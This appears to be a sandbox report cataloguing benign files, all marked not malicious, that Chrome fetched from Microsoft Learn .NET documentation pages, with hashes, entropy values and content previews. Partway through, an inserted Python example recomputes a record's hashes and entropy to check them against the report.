Entropy (8bit):2.9129715116732746
Encrypted:false
SSDEEP:24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
MD5:12E3DAC858061D088023B2BD48E2FA96
SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
Malicious:false
URL:https://learn.microsoft.com/favicon.ico
Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""

Process:C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:JSON data
Category:dropped
Size (bytes):5644
Entropy (8bit):4.785769732002188
Encrypted:false
SSDEEP:96:ogVOjPW7cI3aDNjExAjfWQpL0dpwmWMv7AD8RevyvRJNjyZPtJ27RlhiewZjMeZf:og5cUaDNjESLWQN0dpwm9+6DlUu7lYjX
MD5:B5885C991E30238110973653F2408300
SHA1:39B0A79D951F8254E21821134E047C76F57AD2A8
SHA-256:085BF5AE32E6F7F1299CA79248B0CB67EBD31566728A69F4466E1659C004732E
SHA-512:6BEC209D933C7A1065047637F550B7A36809D835938C04851A3B09DF644BD3EC85A2CE30F73FCFB709FE7AF3453799B2EB76702D0AB2BE067CD07D2EC03537C0
Malicious:false
Preview:{"brandLink":{"biName":"learn","displayName":"Learn","href":"/"},"featuredContent":[{"biName":"1-microsoft-learn-for-organizations","description":"Access curated resources to upskill your team and close skills gaps.","href":"/training/organizations/","supertitle":"Microsoft Learn for Organizations","title":"Boost your team\u0027s technical skills"}],"metadata":{"git_commit_id":"dab49ca79cb372010aeaec5e99463f6cec8df000"},"navCategories":[{"biName":"1-discover","panel":{"panelContent":[{"biName":"1-documentation","componentType":"header-panel-card","description":"In-depth articles on Microsoft developer tools and technologies","href":"/docs/","title":"Documentation"},{"biName":"2-training","componentType":"header-panel-card","description":"Personalized learning paths and courses","href":"/training/","title":"Training"},{"biName":"3-credentials","componentType":"header-panel-card","description":"Globally recognized, industry-endorsed credentials","href":"/credentials/","title":"Credential
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
Category:dropped
Size (bytes):17174
Entropy (8bit):2.9129715116732746
Encrypted:false
SSDEEP:24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
MD5:12E3DAC858061D088023B2BD48E2FA96
SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
Malicious:false
Process:C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:PNG image data, 658 x 480, 8-bit/color RGBA, non-interlaced
Category:downloaded
Size (bytes):13842
Entropy (8bit):7.802399161550213
Encrypted:false
SSDEEP:192:NLNf+jBQsDHg7av3EEondO8PuRu2mIYXEIiDm42NpsHFMHfgnJ4K2DVwv:NLt+1jDmY+ndXwjLUpiDwpzfwoDVk
MD5:F6EC97C43480D41695065AD55A97B382
SHA1:D9C3D0895A5ED1A3951B8774B519B8217F0A54C5
SHA-256:07A599FAB1E66BABC430E5FED3029F25FF3F4EA2DD0EC8968FFBA71EF1872F68
SHA-512:22462763178409D60609761A2AF734F97B35B9A818EC1FD9046AFAB489AAD83CE34896EE8586EFE402EA7739ECF088BC2DB5C1C8E4FB39E6A0FC5B3ADC6B4A9B
Malicious:false
URL:https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/install-3-5.png
Process:C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:ASCII text, with very long lines (33273), with no line terminators
Category:dropped
Size (bytes):33273
Entropy (8bit):4.918756013698695
Encrypted:false
SSDEEP:384:FnvJOb4OLIch+KCnMet7NPXlJl+HjZjBTRdE0zIwHdZ4vNNpUjV8din4E9hLUukj:5hOEO8chkMet7pCjBfcHkWOzUukj
MD5:86E84C732A96BF9CF18C99B48DB90B6D
SHA1:6A8C212067CB9FE5B8325AE1E89FCA3E7FCF20FA
SHA-256:B54678C5BFB00DC1AFBF2E52C56F8E10173975C25FB19062EFE5DC86F1B7D769
SHA-512:AD91A78371074B5BB2105A9AE69664371C235B7C82DFD25C9ED17F435E92018F2A0DD42203F403D7A75DF4FC63966017519F118B2B22F0DE7656B2B155636AA2
Malicious:false
Process:C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:JSON data
Category:downloaded
Size (bytes):5644
Entropy (8bit):4.785769732002188
Encrypted:false
SSDEEP:96:ogVOjPW7cI3aDNjExAjfWQpL0dpwmWMv7AD8RevyvRJNjyZPtJ27RlhiewZjMeZf:og5cUaDNjESLWQN0dpwm9+6DlUu7lYjX
MD5:B5885C991E30238110973653F2408300
SHA1:39B0A79D951F8254E21821134E047C76F57AD2A8
SHA-256:085BF5AE32E6F7F1299CA79248B0CB67EBD31566728A69F4466E1659C004732E
SHA-512:6BEC209D933C7A1065047637F550B7A36809D835938C04851A3B09DF644BD3EC85A2CE30F73FCFB709FE7AF3453799B2EB76702D0AB2BE067CD07D2EC03537C0
Malicious:false
URL:https://learn.microsoft.com/en-us/content-nav/site-header/site-header.json?
Process:C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:Web Open Font Format (Version 2), TrueType, length 19696, version 1.0
Category:downloaded
Size (bytes):19696
Entropy (8bit):7.9898910353479335
Encrypted:false
SSDEEP:384:37wfQhsuDSP36Elj0oScS8w3F1ZTt5JwtRGsh1SJR3YL0BeojRs8E:37Cms69owH3FPutReFYL+eods8E
MD5:4D0BFEA9EBDA0657CEE433600ED087B6
SHA1:F13C690B170D5BA6BE45DEDC576776CA79718D98
SHA-256:67E7D8E61B9984289B6F3F476BBEB6CEB955BEC823243263CF1EE57D7DB7AE9A
SHA-512:9136ADEC32F1D29A72A486B4604309AA8F9611663FA1E8D49079B67260B2B09CEFDC3852CF5C08CA9F5D8EA718A16DBD8D8120AC3164B0D1519D8EF8A19E4EA5
Malicious:false
URL:https://learn.microsoft.com/static/assets/0.4.029026183/styles/docons.6a251ae.34a85e0c.woff2
Process:C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 1528x402, components 3
Category:dropped
Size (bytes):64291
Entropy (8bit):7.964191793580486
Encrypted:false
SSDEEP:1536:NHnitWEy8ugr5KeKvJx4FqzmYyIf52YHcd/HpQxhSoywkY8+N4U4Bv:NHitHyJTeysFqiYyIfEYHchQWoywkY8v
MD5:8CCB0248B7F2ABEEAD74C057232DF42A
SHA1:C02BD92FEA2DF7ED12C8013B161670B39E1EC52F
SHA-256:0A9FD0C7F32EABBB2834854C655B958EC72A321F3C1CF50035DD87816591CDCC
SHA-512:6D6E3C858886C9D6186AD13B94DBC2D67918AA477FB7D70A7140223FAB435CF109537C51CA7F4B2A0DB00EEAD806BBE8C6B29B947B0BE7044358D2823F5057CE
Malicious:false
Process:C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:PNG image data, 475 x 212, 8-bit/color RGBA, non-interlaced
Category:downloaded
Size (bytes):35005
Entropy (8bit):7.980061050467981
Encrypted:false
SSDEEP:768:aHBEr/QXnbCgWotMq4AZZivq2/Qu0cEv1FjHBep6U0Z/68R:ahWqbTWiM7ACvdIdldhep4rR
MD5:522037F008E03C9448AE0AAAF09E93CB
SHA1:8A32997EAB79246BEED5A37DB0C92FBFB006BEF2
SHA-256:983C35607C4FB0B529CA732BE42115D3FCAAC947CEE9C9632F7CACDBDECAF5A7
SHA-512:643EC613B2E7BDBB2F61E1799C189B0E3392EA5AE10845EB0B1F1542A03569E886F4B54D5B38AF10E78DB49C71357108C94589474B181F6A4573B86CF2D6F0D8
Malicious:false
URL:https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/app-could-not-be-started.png
Process:C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:JSON data
Category:downloaded
Size (bytes):4897
Entropy (8bit):4.8007377074457604
Encrypted:false
SSDEEP:96:A0AIvEQ+KfZcbhaW9dp45qtAdflfDOFnymoLByzfwqrLvJ4QG63JkRJ+dRp8TJHr:dgQ+KfZcbhaWjp45qtAdflfDOFnNgByQ
MD5:0E78F790402498FA57E649052DA01218
SHA1:9ED4D0846DA5D66D44EE831920B141BBF60A0200
SHA-256:73F3061A46EA8FD11D674FB21FEEEFE3753FC3A3ED77224E7F66A964C0420603
SHA-512:B46E4B90E53C7DABC7208A6FDAE53F25BD70FCFBBEF03FFC64B1B5D1EB1C01C870A7309DF167246FCCD114B483038A64D7C46CA3B9FCB3779A77E42DB6967051
Malicious:false
URL:https://learn.microsoft.com/en-us/content-nav/MSDocsHeader-DotNet.json?
Process:C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:JSON data
Category:dropped
Size (bytes):72
Entropy (8bit):4.241202481433726
Encrypted:false
SSDEEP:3:YozDD/RNgQJzRWWlKFiFD3e4xCzY:YovtNgmzR/wYFDxkY
MD5:9E576E34B18E986347909C29AE6A82C6
SHA1:532C767978DC2B55854B3CA2D2DF5B4DB221C934
SHA-256:88BDF5AF090328963973990DE427779F9C4DF3B8E1F5BADC3D972BAC3087006D
SHA-512:5EF6DCFFD93434D45760888BF4B95FF134D53F34DA9DC904AD3C5EBEDC58409073483F531FEA4233869ED3EC75F38B022A70B2E179A5D3A13BDB10AB5C46B124
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:{"Message":"The requested resource does not support http method 'GET'."}
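The 72-byte JSON record above is small enough to reproduce byte-for-byte from its Preview, which makes it a convenient fixture for checking how the per-file fields in these records are derived and for cross-checking an artifact against the report offline. The script below is an added example, not Joe Sandbox code: it recomputes MD5/SHA-1/SHA-256/SHA-512 and the 8-bit Shannon entropy for a constructed copy of that file and compares them with the values printed in the record. The `ENCRYPTED_ENTROPY_THRESHOLD` heuristic is an assumption of this example; the rule Joe Sandbox uses for its `Encrypted` flag is not stated on this page.

```python
"""Recompute the fields a sandbox dropped-file record reports (size, hashes,
8-bit entropy) so an artifact can be verified against the report offline.
Added example; not Joe Sandbox code."""
import hashlib
import math
from collections import Counter

# Constructed sample: the 72-byte JSON body shown in the record above,
# reproduced exactly, with no trailing newline.
SAMPLE_JSON = b'{"Message":"The requested resource does not support http method \'GET\'."}'

# Constructed sample with a perfectly flat byte distribution: entropy hits the
# 8-bit ceiling, which compressed or encrypted data approaches (the JPEG and
# PNG records on this page sit around 7.8 to 7.98).
SAMPLE_FLAT = bytes(range(256))

# Assumption of this example, not a published Joe Sandbox rule.
ENCRYPTED_ENTROPY_THRESHOLD = 7.99

# Fields copied from the record above for the 72-byte JSON file.
REPORTED_JSON = {
    "size": 72,
    "entropy": 4.241202481433726,
    "md5": "9E576E34B18E986347909C29AE6A82C6",
    "sha1": "532C767978DC2B55854B3CA2D2DF5B4DB221C934",
    "sha256": "88BDF5AF090328963973990DE427779F9C4DF3B8E1F5BADC3D972BAC3087006D",
    "sha512": "5EF6DCFFD93434D45760888BF4B95FF134D53F34DA9DC904AD3C5EBEDC58409073483F531FEA4233869ED3EC75F38B022A70B2E179A5D3A13BDB10AB5C46B124",
}


def shannon_entropy_8bit(data: bytes) -> float:
    """Shannon entropy in bits per byte over the empirical byte distribution."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def describe(data: bytes) -> dict:
    """Compute the same set of fields the report prints for one dropped file."""
    entropy = shannon_entropy_8bit(data)
    return {
        "size": len(data),
        "entropy": entropy,
        "encrypted_guess": entropy >= ENCRYPTED_ENTROPY_THRESHOLD,
        "md5": hashlib.md5(data).hexdigest(),
        "sha1": hashlib.sha1(data).hexdigest(),
        "sha256": hashlib.sha256(data).hexdigest(),
        "sha512": hashlib.sha512(data).hexdigest(),
    }


def matches_report(data: bytes, report: dict) -> list:
    """Return the names of report fields that disagree with the artifact.

    Hash comparison is case-insensitive because the report prints uppercase
    hex; entropy is compared with a small tolerance because the report prints
    a float and summation order can differ in the last bits.
    """
    actual = describe(data)
    mismatches = []
    for key in ("md5", "sha1", "sha256", "sha512"):
        if key in report and report[key].lower() != actual[key]:
            mismatches.append(key)
    if "size" in report and report["size"] != actual["size"]:
        mismatches.append("size")
    if "entropy" in report and abs(report["entropy"] - actual["entropy"]) > 1e-6:
        mismatches.append("entropy")
    return mismatches


if __name__ == "__main__":
    print("JSON record mismatches:", matches_report(SAMPLE_JSON, REPORTED_JSON))
    print("flat-distribution entropy:", describe(SAMPLE_FLAT)["entropy"])
```

A practical note on the comparison: the entropy check alone is a strong fingerprint of the byte multiset (the reported 4.2412 is only reproduced by that exact 72-byte body; appending a single newline changes every field, including entropy), but only the hashes pin down byte order, so compare both when reconciling an artifact pulled from a host with a sandbox record.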
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 1528x402, components 3
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):64291
                                                                                                                                                                                            Entropy (8bit):7.964191793580486
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:1536:NHnitWEy8ugr5KeKvJx4FqzmYyIf52YHcd/HpQxhSoywkY8+N4U4Bv:NHitHyJTeysFqiYyIfEYHchQWoywkY8v
                                                                                                                                                                                            MD5:8CCB0248B7F2ABEEAD74C057232DF42A
                                                                                                                                                                                            SHA1:C02BD92FEA2DF7ED12C8013B161670B39E1EC52F
                                                                                                                                                                                            SHA-256:0A9FD0C7F32EABBB2834854C655B958EC72A321F3C1CF50035DD87816591CDCC
                                                                                                                                                                                            SHA-512:6D6E3C858886C9D6186AD13B94DBC2D67918AA477FB7D70A7140223FAB435CF109537C51CA7F4B2A0DB00EEAD806BBE8C6B29B947B0BE7044358D2823F5057CE
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            URL:https://learn.microsoft.com/en-us/media/event-banners/banner-learn-challenge-2024.jpg
                                                                                                                                                                                            Preview:......JFIF..............ICC_PROFILE............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6...C....................................................................C............................................................................"..........................................\......................!1..A.Qaq......".....#23BR......56Urst....$%4ST....&CDbcd......EFV.u...................................[...........................!1.AQR...."2Saq.......Ts.......#356BCDUbr.....%&47c.....$'Et..............?...j.....'Gu..7.=......8. ..nh..F.....y ..=....1L\U.+.Pj.RnI.(...N.{%].b..J..r...W[
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:exported SGML document, ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):1173007
                                                                                                                                                                                            Entropy (8bit):5.503893944397598
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:24576:VMga+4IVzOjS1Jho1WXQFjTEr39/jHXzT:VMcVzOjS1Jho1WXQar39/bXzT
                                                                                                                                                                                            MD5:2E00D51C98DBB338E81054F240E1DEB2
                                                                                                                                                                                            SHA1:D33BAC6B041064AE4330DCC2D958EBE4C28EBE58
                                                                                                                                                                                            SHA-256:300480069078B5892D2363A2B65E2DFBBF30FE5C80F83EDBFECF4610FD093862
                                                                                                                                                                                            SHA-512:B6268D980CE9CB729C82DBA22F04FD592952B2A1AAB43079CA5330C68A86E72B0D232CE4070DB893A5054EE5C68325C92C9F1A33F868D61EBB35129E74FC7EF9
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:(function(){"use strict";var __webpack_modules__={351:function(t,e,r){var n,o=this&&this.__extends||(n=function(t,e){return n=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(t,e){t.__proto__=e}||function(t,e){for(var r in e)Object.prototype.hasOwnProperty.call(e,r)&&(t[r]=e[r])},n(t,e)},function(t,e){if("function"!=typeof e&&null!==e)throw new TypeError("Class extends value "+String(e)+" is not a constructor or null");function r(){this.constructor=t}n(t,e),t.prototype=null===e?Object.create(e):(r.prototype=e.prototype,new r)}),i=this&&this.__assign||function(){return i=Object.assign||function(t){for(var e,r=1,n=arguments.length;r<n;r++)for(var o in e=arguments[r])Object.prototype.hasOwnProperty.call(e,o)&&(t[o]=e[o]);return t},i.apply(this,arguments)},s=this&&this.__read||function(t,e){var r="function"==typeof Symbol&&t[Symbol.iterator];if(!r)return t;var n,o,i=r.call(t),s=[];try{for(;(void 0===e||e-- >0)&&!(n=i.next()).done;)s.push(n.value)}catch(t){o={error:t}}finally
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):1154
                                                                                                                                                                                            Entropy (8bit):4.59126408969148
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:24:txFRuJpzYeGK+VS6ckNL2091JP/UcHc8oQJ1sUWMLc/jH6GbKqjHJIOHA:JsfcU6ckNL2091Z/U/YsUDM+GhS
                                                                                                                                                                                            MD5:37258A983459AE1C2E4F1E551665F388
                                                                                                                                                                                            SHA1:603A4E9115E613CC827206CF792C62AEB606C941
                                                                                                                                                                                            SHA-256:8E34F3807B4BF495D8954E7229681DA8D0DD101DD6DDC2AD7F90CD2983802B44
                                                                                                                                                                                            SHA-512:184CB63EF510143B0AF013F506411C917D68BB63F2CFA47EA2A42688FD4F55F3B820AF94F87083C24F48AACEE6A692199E185FC5C5CFBED5D70790454EED7F5C
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            URL:https://learn.microsoft.com/en-us/media/logos/logo_net.svg
                                                                                                                                                                                            Preview:<svg width="456" height="456" viewBox="0 0 456 456" fill="none" xmlns="http://www.w3.org/2000/svg">..<rect width="456" height="456" fill="#512BD4"/>..<path d="M81.2738 291.333C78.0496 291.333 75.309 290.259 73.052 288.11C70.795 285.906 69.6665 283.289 69.6665 280.259C69.6665 277.173 70.795 274.529 73.052 272.325C75.309 270.121 78.0496 269.019 81.2738 269.019C84.5518 269.019 87.3193 270.121 89.5763 272.325C91.887 274.529 93.0424 277.173 93.0424 280.259C93.0424 283.289 91.887 285.906 89.5763 288.11C87.3193 290.259 84.5518 291.333 81.2738 291.333Z" fill="white"/>..<path d="M210.167 289.515H189.209L133.994 202.406C132.597 200.202 131.441 197.915 130.528 195.546H130.044C130.474 198.081 130.689 203.508 130.689 211.827V289.515H112.149V171H134.477L187.839 256.043C190.096 259.57 191.547 261.994 192.192 263.316H192.514C191.977 260.176 191.708 254.859 191.708 247.365V171H210.167V289.515Z" fill="white"/>..<path d="M300.449 289.515H235.561V171H297.87V187.695H254.746V221.249H294.485V237.861H254.746V
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (33273), with no line terminators
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):33273
                                                                                                                                                                                            Entropy (8bit):4.918756013698695
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:384:FnvJOb4OLIch+KCnMet7NPXlJl+HjZjBTRdE0zIwHdZ4vNNpUjV8din4E9hLUukj:5hOEO8chkMet7pCjBfcHkWOzUukj
                                                                                                                                                                                            MD5:86E84C732A96BF9CF18C99B48DB90B6D
                                                                                                                                                                                            SHA1:6A8C212067CB9FE5B8325AE1E89FCA3E7FCF20FA
                                                                                                                                                                                            SHA-256:B54678C5BFB00DC1AFBF2E52C56F8E10173975C25FB19062EFE5DC86F1B7D769
                                                                                                                                                                                            SHA-512:AD91A78371074B5BB2105A9AE69664371C235B7C82DFD25C9ED17F435E92018F2A0DD42203F403D7A75DF4FC63966017519F118B2B22F0DE7656B2B155636AA2
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            URL:https://learn.microsoft.com/en-us/dotnet/framework/toc.json
                                                                                                                                                                                            Preview:{"items":[{"href":"./","toc_title":".NET Framework documentation"},{"href":"get-started/overview","toc_title":"Overview of .NET Framework"},{"children":[{"href":"get-started/","toc_title":"Overview"},{"href":"get-started/out-of-band-releases","toc_title":"Out-of-band releases"},{"href":"get-started/system-requirements","toc_title":"System requirements"}],"toc_title":"Get started"},{"children":[{"href":"install/","toc_title":"Overview"},{"href":"install/guide-for-developers","toc_title":"For developers"},{"children":[{"href":"install/on-windows-11","toc_title":"Windows 11"},{"href":"install/on-windows-10","toc_title":"Windows 10 and Windows Server 2016"},{"href":"install/on-windows-8-1","toc_title":"Windows 8.1 and Windows Server 2012 R2"},{"href":"install/on-windows-8","toc_title":"Windows 8 and Windows Server 2012"},{"href":"install/on-server-2022","toc_title":"Windows Server 2022"},{"href":"install/on-server-2019","toc_title":"Windows Server 2019"}],"toc_title":"By OS version"},{"hre
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:PNG image data, 475 x 212, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):35005
                                                                                                                                                                                            Entropy (8bit):7.980061050467981
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:768:aHBEr/QXnbCgWotMq4AZZivq2/Qu0cEv1FjHBep6U0Z/68R:ahWqbTWiM7ACvdIdldhep4rR
                                                                                                                                                                                            MD5:522037F008E03C9448AE0AAAF09E93CB
                                                                                                                                                                                            SHA1:8A32997EAB79246BEED5A37DB0C92FBFB006BEF2
                                                                                                                                                                                            SHA-256:983C35607C4FB0B529CA732BE42115D3FCAAC947CEE9C9632F7CACDBDECAF5A7
                                                                                                                                                                                            SHA-512:643EC613B2E7BDBB2F61E1799C189B0E3392EA5AE10845EB0B1F1542A03569E886F4B54D5B38AF10E78DB49C71357108C94589474B181F6A4573B86CF2D6F0D8
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:.PNG........IHDR..............[.U....sRGB.........gAMA......a.....pHYs..........+.....RIDATx^..`........B hpwww(PJ....R.B.....K[j....@ H ..r:...].P._.`...K.ffg.v.ygf.TM.4.m...`.D".H$......"##..2e.X.t..Y".H$...d..PK.V".H$..uVm.,.H$.....b+.H$.I-#.V".H$.ZF..D".H$...[.D".Hj.)...D"..2Rl%..D".e..J$..DR.H..H$.....b+.H$..9..Neee.X,.B.\/.....o.b+.H$..9...q...EHU*....p.....=z....b.7.q..........N.. ....cUAX.9...m'_...2.`.g{...4.H.9.p.4...K ^.....`.|.n*..]..m..`W..W.H.~..|.^.a..K.6......_....K..w....9......^.....&...R....[...w..Ix=.:..^/..Epp0.5.....QRR...l....S.b.5.c.6...5..8.\....z...I......&.>....../.{.=...]'c......[.E`@Cg......Z.....c.f..,.y|,.{.o@.j..2..:.&l4.{.]Ll.N.0..b:b...g.n.........I...Ewc....[..,i`v......F...il|.c,{.-.....%BP.U........y.x....6..E2..n.W...J .*..`..r....F....#BCC......|.L&........O...'........\.....;...q.n$...7...ga..x....)..A...0.{1..'1../...+yRC...W.-..b..c0dDG...U[po....2eG.G.../.@........h.:.k?.......Q...
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:PNG image data, 658 x 480, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):13842
                                                                                                                                                                                            Entropy (8bit):7.802399161550213
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:192:NLNf+jBQsDHg7av3EEondO8PuRu2mIYXEIiDm42NpsHFMHfgnJ4K2DVwv:NLt+1jDmY+ndXwjLUpiDwpzfwoDVk
                                                                                                                                                                                            MD5:F6EC97C43480D41695065AD55A97B382
                                                                                                                                                                                            SHA1:D9C3D0895A5ED1A3951B8774B519B8217F0A54C5
                                                                                                                                                                                            SHA-256:07A599FAB1E66BABC430E5FED3029F25FF3F4EA2DD0EC8968FFBA71EF1872F68
                                                                                                                                                                                            SHA-512:22462763178409D60609761A2AF734F97B35B9A818EC1FD9046AFAB489AAD83CE34896EE8586EFE402EA7739ECF088BC2DB5C1C8E4FB39E6A0FC5B3ADC6B4A9B
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:.PNG........IHDR................1....sRGB.........gAMA......a.....pHYs..........o.d..5.IDATx^..[.,.]...../<.!.B(/y..).F\r...!(.H..a ..B.~..A..KXA.M...6..8...!1....l./.X.1....2.`.y"l..R...V.....{...}._gWW.Z.VUw.N...U..P@..... ..@.A...".$..E.I.........$..("H..PD..... ..p....U.}.{.....l..A.....A........s.......D.0...@....E..x........L. /.".A.....$...Y."...%.I..["../.&.I..[`.0..IA.........p4.I.........$..("H..PD..... ..@.A...".$..E.I.........$..("H..PD..... ..@.A...".$..E.>H...O.................?.~.......].7.....a?....(H....m.G..G..a.P..?yo......f?...o. .B.....mo{[....:9<].....7.....a.....S..Cd.5,.R....#....>......._g.....Wo|.....z.g.........w.T...]x.>.....y(.........6....[..px...U....~.~hu...}H.......~.L... ....r...iY.$..Id..Ax"../....._..U....OTo|.Mh.km..A.k..k....n.C`|._\=...o...a.e.. ...&.A2..k.. ....X.+...C..P....y..>.{._..(H....8(.?...w.}M.........:s_!.m.........BY..T..z.5{.W.~..6.....F....bq....m.....?.......v....o..o...ki...iX.$......\]V...V...
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):4897
                                                                                                                                                                                            Entropy (8bit):4.8007377074457604
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:96:A0AIvEQ+KfZcbhaW9dp45qtAdflfDOFnymoLByzfwqrLvJ4QG63JkRJ+dRp8TJHr:dgQ+KfZcbhaWjp45qtAdflfDOFnNgByQ
                                                                                                                                                                                            MD5:0E78F790402498FA57E649052DA01218
                                                                                                                                                                                            SHA1:9ED4D0846DA5D66D44EE831920B141BBF60A0200
SHA-256:73F3061A46EA8FD11D674FB21FEEEFE3753FC3A3ED77224E7F66A964C0420603
SHA-512:B46E4B90E53C7DABC7208A6FDAE53F25BD70FCFBBEF03FFC64B1B5D1EB1C01C870A7309DF167246FCCD114B483038A64D7C46CA3B9FCB3779A77E42DB6967051
Malicious:false
Preview:{"callToAction":{"primary":{"biName":"download-dotnet","href":"https://dotnet.microsoft.com/download","kind":"link","title":"Download .NET"}},"category":{"biName":"dotnet","href":"/dotnet/","kind":"link","title":".NET"},"items":[{"biName":"1-languages","items":[{"biName":"1-c-sharp","href":"/dotnet/csharp/","kind":"link","title":"C#"},{"biName":"2-f-sharp","href":"/dotnet/fsharp/","kind":"link","title":"F#"},{"biName":"3-visual-basic","href":"/dotnet/visual-basic/","kind":"link","title":"Visual Basic"}],"kind":"menu","title":"Languages"},{"biName":"2-features","items":[{"biName":"1-fundamental","href":"/dotnet/fundamentals/","kind":"link","title":"Fundamentals"},{"biName":"2-tools-and-diagnostics","href":"/dotnet/navigate/tools-diagnostics/","kind":"link","title":"Tools and diagnostics"},{"biName":"3-ai","items":[{"biName":"1-generative-ai","href":"/dotnet/ai/","kind":"link","title":"Generative AI"},{"biName":"2-mlnet","href":"/dotnet/machine-learning/","kind":"link","title":"ML.NET"}]

Process:C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:ASCII text, with very long lines (46884)
Category:downloaded
Size (bytes):1817143
Entropy (8bit):5.501007973622959
Encrypted:false
SSDEEP:24576:aLX8PHFluFxBSB1DkCXWjfz8gEPPXL/tie:auHFluFxBSB1DkCXWjfz7EPPXztH
MD5:F57E274AE8E8889C7516D3E53E3EB026
SHA1:F8D21465C0C19051474BE6A4A681FA0B0D3FCC0C
SHA-256:2A2198DDBDAEDD1E968C0A1A45F800765AAE703675E419E46F6E51E3E9729D01
SHA-512:9A9B42F70E09D821B799B92CB6AC981236FCF190F0A467CA7F7D382E3BCA1BC1D71673D37CD7426499D24DFBC0B7A6D10676C0E3FB2B0292249A5ABAB78F23F4
Malicious:false
